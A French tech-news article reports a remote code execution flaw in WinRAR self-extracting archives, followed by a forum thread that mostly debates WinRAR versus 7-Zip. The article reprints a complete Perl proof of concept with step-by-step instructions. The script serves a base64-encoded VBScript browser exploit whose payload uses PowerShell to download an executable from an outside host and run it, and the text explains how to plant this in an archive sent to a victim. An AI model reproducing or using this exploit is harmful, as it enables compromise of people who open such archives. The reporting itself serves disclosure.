Une faille critique dans Winrar permet d’exécuter du code à distance sans élévation de privilège

**Olivier Famien** · 30/09/2015, 23h55

Une faille critique dans Winrar permet d’exécuter du code à distance sans élévation de privilège
exposant ainsi plus de 500 millions d’utilisateurs

Un chercheur en sécurité du nom de Reza Espargham vient d’annoncer la découverte d’une faille critique dans le logiciel de compression Winrar SFX version 5.21. Cette vulnérabilité permet d’exécuter une attaque à distance afin de compromettre le système sur lequel l’application est installée.

En fait le problème se trouve dans la fonction « Texte et Icone » contenant la zone de texte « Texte à afficher dans la fenêtre SFX ». En insérant du code spécifique dans cette zone de texte, des attaquants sont capables de générer à distance une charge utile pour compromettre le système de la victime.

De manière pratique, l’attaquant va d’abord effectuer quelques petites modifications et exécuter le code Perl ci-dessous contenu dans un fichier poc.pl qu’il aura créé.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
#!/usr/bin/perl
# Title : WinRaR SFX - Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7 / Server 2008
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
#
#
# MS14-064
#
#
# 1 . run perl code : perl poc.pl
# 2 . Right Click on any file and select "add to archive..."
# 3 . select "Create SFX archive"
# 4 . got to Advanced Menu and select "SFX options..."
# 5 . goto to "Text and icon" Menu
# 6 . copy this perl output (HTML) and past on "Text to display in SFX window"
# 7 . Click OK -- OK
# 8 . Your SFX file Created ;)
# 9 . just open sfx file
# 10 . Your Link Download/Execute on your target
# 11 . Finished ;)


#demo https://youtu.be/fo0l0oT4468

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';



print "    Mohammad Reza Espargham\n\n";
my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));




my $port = 80;

print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n" if($port==80);
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . '"></head></html>'."\n\n" if($port!=80);

my $server = new IO::Socket::INET(  Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
ReuseAddr => 1)
or die "Unable to create server socket";

# Server loop
while(my $client = $server->accept())
{
    my $client_info;
    while(<$client>)
    {
        last if /^\r\n$/;
        $client_info .= $_;
    }
    incoming($client, $client_info);
}

sub incoming
{
    print "\n=== Incoming Request:\n";
    my $client = shift;
    print $client &buildResponse($client, shift);
    close($client);
}

sub buildResponse
{
    my $client = shift;
    my $client_info = shift;
    
    my $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVt
    dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJT
    Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNo
    ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhw
    cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgn
    aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUn
    LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4
    ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwg
    Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3Jp
    cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFi
    KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAg
    aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdp
    bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZp
    Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAg
    IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAg
    IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5m
    bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAg
    ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVh
    dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZj
    aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAg
    IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAK
    ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4g
    SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVs
    bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3Rz
    YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJl
    Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAg
    IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u
    IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQog
    IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1U
    cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3Vi
    IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1l
    IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShh
    MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3
    NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0
    NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEo
    YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24g
    RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1y
    dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQK
    ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAg
    ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAg
    ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICBy
    ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShp
    KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAg
    ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAg
    cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBS
    ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBh
    MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFBy
    ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJl
    c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2
    Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3Qo
    YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAg
    ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlw
    ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4K
    ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAg
    ICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAgICAK
    ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAg
    IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVs
    c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQg
    IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlm
    KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVj
    dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUo
    YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBl
    bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAg
    IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAg
    CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRy
    dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBh
    YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRk
    KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAK
    ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1
    OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFi
    KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+
    CiAKPC9ib2R5Pgo8L2h0bWw+";
    $poc = decode_base64($poc);
    
    my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n
    $poc";
    return $r;
}

Ensuite, il va créer une archive SFX avec la dernière version de Winrar. Pour arriver à ses fins, il va suivre les étapes normales de la création d’une archive et sélectionner « créer une archive SFX », puis dans le Menu avancé, il va sélectionner « Options SFX ».

Dans le menu « Texte et icône » affiché se trouve une zone de texte avec comme étiquette « Texte à afficher dans la Fenêtre SFX ». Dans cette zone de texte, il va copier et coller le code HTML généré à partir du code Perl. Enfin, il fera OK, OK pour valider les différentes étapes. C’est cette archive SFX qui sera envoyée à la victime afin de compromettre son système. Nous rappelons qu'une archive SFX est une archive Windows auto-extractible.

Pour ceux qui le souhaitent, ils peuvent également consulter la vidéo ci-dessous afin de suivre visuellement la preuve de concept.

Lorsqu’un utilisateur ouvrira l’archive infectée, la charge utile du fichier infecté va exposer le système de l’utilisateur. Il faut souligner que cette attaque ne nécessite pas d’élévation de privilège. Il suffit pour la victime d’ouvrir le fichier et le tour est joué. Pieter Arntz, MVP Microsoft, a testé avec succès cette procédure. Bien entendu, il a d'abord effectué quelques petites modifications du code ci-dessus afin d'aboutir au même résultat que l'auteur de la découverte.

Il faut rappeler également que Winrar est utilisé par plus de 500 millions d’utilisateurs à travers le monde. Cette version affecte donc l’ensemble de ses utilisateurs qui se trouvent principalement sur la plateforme Windows. Prière à chaque personne de ne pas ouvrir les archives SFX provenant de personnes inconnues dans la mesure où aucun correctif n’a encore été publié.

Source : Seclists

Et vous ?

Que pensez-vous de cette faille ?

Voir aussi

Forum Sécurité

**derderder** · 01/10/2015, 01h24

Conclusion : laisser tomber winrar et passer à 7-zip.
Je trouve d'ailleurs que l'on peut comparer winrar et 7zip à flash et html5.

**BufferBob** · 01/10/2015, 02h57

ahh elle est mignonnette celle là, elle mériterait bien son pwnie award du "most epic fail" à mon avis

bon et en même temps si on en est à lancer un SFX... c'est qu'on lui fait confiance (le truc va poser des fichiers et exécuter un script à la fin de toutes façons) du coup la vuln est intéressante si l'utilisateur est d'accord pour la lancer

**spacm** · 01/10/2015, 07h16

Comme le disent les devs de winrar, les archives auto-extractibles sont des exécutables. C'est le cas de toutes les archives auto-extractibles, celles de winzip comprises. Et comme ils le disent, la vraie faille, c'est que l'utilisateur accepte de lancer des exécutables de source douteuse. C'est un peu comme si on nous indiquait une faille de sécurité trouvée sur un couteau: en le tenant à l'envers, on peut se couper... Ben, oui, un couteau, ça coupe, c'est à ça que ça sert.

**chrtophe** · 01/10/2015, 07h32

Même si effectivement tout .exe peut être douteux, c'est toujours pertinent de rabâcher aux gens de se méfier, surtout pour les débutants.

**Aiekick** · 01/10/2015, 10h46

winrar est bien plus rapide a compresser/décompresser que 7-Zip. quelle blague ce 7-Zip.

**Volgaan** · 01/10/2015, 11h30

Envoyé par cuicui78

winrar est bien plus rapide a compresser/décompresser que 7-Zip. quelle blague ce 7-Zip.

Merci pour le troll

Effectivement, si tu prends l'algo LZMA en compression Ultra, ça va prendre un tantinet de temps

Si la vitesse est importante, tu sélectionnes un autre niveau de compression, c'est pas compliqué. Ou alors tu prends LZMA2, tu mets tous les threads possibles et là ça ira un peu plus vite, au détriment du taux de compression par contre (RTFM).

Et puis le LZMA est quand même plus efficace que RAR en terme d'efficacité : il compresse mieux, les archives obtenues sont plus petites. Parfois de peu, mais généralement c'est LZMA qui sort vainqueur. Maintenant, avec RAR5, je ne sais pas. C'est toujours mieux que Deflate de toute façon

**Watilin** · 01/10/2015, 14h28

Envoyé par spacm

Comme le disent les devs de winrar, les archives auto-extractibles sont des exécutables. C'est le cas de toutes les archives auto-extractibles, celles de winzip comprises. Et comme ils le disent, la vraie faille, c'est que l'utilisateur accepte de lancer des exécutables de source douteuse. C'est un peu comme si on nous indiquait une faille de sécurité trouvée sur un couteau: en le tenant à l'envers, on peut se couper... Ben, oui, un couteau, ça coupe, c'est à ça que ça sert.

Sur ce critère on pourrait considérer que le meilleur gestionnaire d'archives est celui qui, à dessein, ne prend pas en charge les auto-extractibles.

**Aiekick** · 01/10/2015, 17h36

Envoyé par Volgaan

Merci pour le troll

Effectivement, si tu prends l'algo LZMA en compression Ultra, ça va prendre un tantinet de temps

Si la vitesse est importante, tu sélectionnes un autre niveau de compression, c'est pas compliqué. Ou alors tu prends LZMA2, tu mets tous les threads possibles et là ça ira un peu plus vite, au détriment du taux de compression par contre (RTFM).

Et puis le LZMA est quand même plus efficace que RAR en terme d'efficacité : il compresse mieux, les archives obtenues sont plus petites. Parfois de peu, mais généralement c'est LZMA qui sort vainqueur. Maintenant, avec RAR5, je ne sais pas. C'est toujours mieux que Deflate de toute façon

je répondait au post de derderder

je comprend pas ce que les gens ont avec 7-Zip ok c'est open source mais ca je m'en fou. j'en ai testé un paquet et le seul que j'ai gardé c'est winrar.
si tu compare a système egal, il les coiffe tous au poteau.

**bytecode** · 02/10/2015, 05h40

Salut, la chose que je comprend le moins sur cette vidéo c'est que par défaut seven n'affiche pas les extensions de fichiers je trouve cela bien plus alarmant...
on peut faire la même vidéo avec un fichier PDF et un script powerpoint.

pour moi il n'y a rien de nouveau une archive sfx reste une tache automatisé qui lance tout et n'importe quoi...

Bonne continuation.

**Volgaan** · 02/10/2015, 08h53

Envoyé par cuicui78

je répondait au post de derderder

je comprend pas ce que les gens ont avec 7-Zip ok c'est open source mais ca je m'en fou. j'en ai testé un paquet et le seul que j'ai gardé c'est winrar.
si tu compare a système egal, il les coiffe tous au poteau.

Sur quels critères ? Le taux de compression, la vitesse, l'utilisation mémoire, les algos disponibles ?

Personnellement, j'utilise 7z déjà car il est gratuit, il offre assez de fonctionnalités pour mon usage, il fait un excellent boulot et le LZMA est suprême (excellente compression, archives solides ou non, paramétrable). Ou alors PPMD lorsqu'il s'agit de compresser des fichiers texte. Après je n'ai rien contre RAR, c'est aussi un excellent algo de compression.

**BufferBob** · 02/10/2015, 09h08

Envoyé par Volgaan

Sur quels critères ?

peu importe

**vanquish** · 02/10/2015, 10h23

Envoyé par cuicui78

je répondait au post de derderder

je comprend pas ce que les gens ont avec 7-Zip ok c'est open source mais ca je m'en fou. j'en ai testé un paquet et le seul que j'ai gardé c'est winrar.
si tu compare a système egal, il les coiffe tous au poteau.

Je suis 100% d'accord.
Sur le terrain du taux de compression 7z est un indiscutable vainqueur, mais c'est là sa quasi seule qualité, alors que le taux de compression est une contrainte d'un autre temps (débit, prix du Mo).

Je lui préfère un Winrar infiniment plus polyvalent.

Pour ce qui est des SFX, comme il a été dit, le soucis vient surtout d'un téléchargement sur une source peu sûre.
Je peux continuer à fournir des SFX en toute sécurité, même si Winrar va devoir corriger ce problème.

**BufferBob** · 02/10/2015, 10h38

Envoyé par vanquish

Sur le terrain du taux de compression 7z est un indiscutable vainqueur, mais c'est là sa quasi seule qualité, alors que le taux de compression est une contrainte d'un autre temps (débit, prix du Mo).

non ben tu as pas du regarder le bench que j'ai link en détail, il semble que la vitesse de compression soit aussi meilleure, par ailleurs on ne compresse pas forcément que des Mo, on compresse aussi des centaines de Go pour les faire transiter sur le réseau parfois (backups ?)

Je lui préfère un Winrar infiniment plus polyvalent.

plus polyvalent en quoi ? (no troll)

**DonQuiche** · 02/10/2015, 11h54

Envoyé par Volgaan

Sur quels critères ? Le taux de compression, la vitesse, l'utilisation mémoire, les algos disponibles ?

Tu as oublié le critère le plus important : l'interface utilisateur.

Peut-être même le seul qui compte.

**Watilin** · 02/10/2015, 12h26

J'ai l'impression que certains des intervenants ici sont en train de confondre le format 7z et le logiciel 7-zip. Non ?

Je suis à peu près de l'avis de BufferBob au sujet du taux de compression, on s'en fiche un peu, du moins quand on est un particulier avec des besoins ordinaires.

Si le débat porte sur les différents logiciels, merci de ne pas nourrir le(s) troll(s). Essayons de rester objectifs. Comme à chaque fois qu'il y a débat sur deux logiciels aux fonctionnalités similaires, la conclusion est qu'on ne peut pas départager les deux. Sinon il n'y aurait pas de débat, la préférence de tout le monde irait au vainqueur.

En réalité, le meilleur logiciel est celui qui est adapté à vos goûts et à vos habitudes. Ainsi, il y a autant de meilleurs logiciels qu'il y a d'utilisateurs.

**Tryph** · 02/10/2015, 13h04

Envoyé par DonQuiche

Tu as oublié le critère le plus important : l'interface utilisateur.

Peut-être même le seul qui compte.

lol

j'ai le plaisir de te décerner la palme de la mauvaise foi

déjà dire que l'interface utilisateur est le critère le plus important c'est porter ton avis (et encore j'espère que tu voulais juste troller et que tu ne le penses pas vraiment sinon c'est triste) au rang de loi universelle. ce qui est vaguement prétentieux. en effet y a des masses de gens qui préfèrent un soft qui travaille efficacement à un équivalent plus joli ou même ergonomique.
bon prétendre ensuite que finalement l'interface utilisateur est peut être le seul élément important d'un soft c'est ce qui déclenche réellement le fou-rire, je vais pas plus m'étendre là dessus.

surtout que chercher les différences entre les interfaces utilisateur de WinRAR et 7-zip c'est un peu comme jouer au jeu des 7 erreurs: on trouve des différences en cherchant bien mais ça reste quasi la même chose.

**chrtophe** · 02/10/2015, 13h11

Il faut comparer ce qui est comparable :

- format de compression
- vitesse de compression (selon l'interface c'est réglable ou pas)
- ergonomie

Les deux logiciels bien réglés se valent dans la majorité des cas (sans parler de benchmarks qui la plupart de temps ne sont pas forcément importants, car personnellement je compresse/décomprese plus souvent des petits fichiers disons inférieur ou autour d'1 ou 2 gigas que d'énormes quantités).

Il faut aussi comparer le temps de compression, plus le taux de compression est efficace, plus la compression prendra du temps, cet aspect compte aussi.

Je trouve l'interface 7-zip moins ergonomique que Winrar, mais c'est un avis personnel et 7-zip n'est pas "compliqué", si ceci est un inconvénient, il a l’avantage d'être libre et gratuit.

Par ailleurs la découverte d'une faille winrar ne veut pas dire qu'il n'y en a pas sous 7-zip. La bonne pratique étant d'éviter les archives SFX quel que soit l'appli utilisée.

**Volgaan** · 02/10/2015, 13h34

C'est clair qu'au niveau de l'ergonomie, 7zip peut encore s'améliorer, mais personnellement ça me va. Clic droit, "Ajouter à l'archive..." et clic doit, "Extraire les fichiers...", ça me suffit. L'interface principale, je l'utilise peu au final si ce n'est pour parcourir des archives, bien entendu.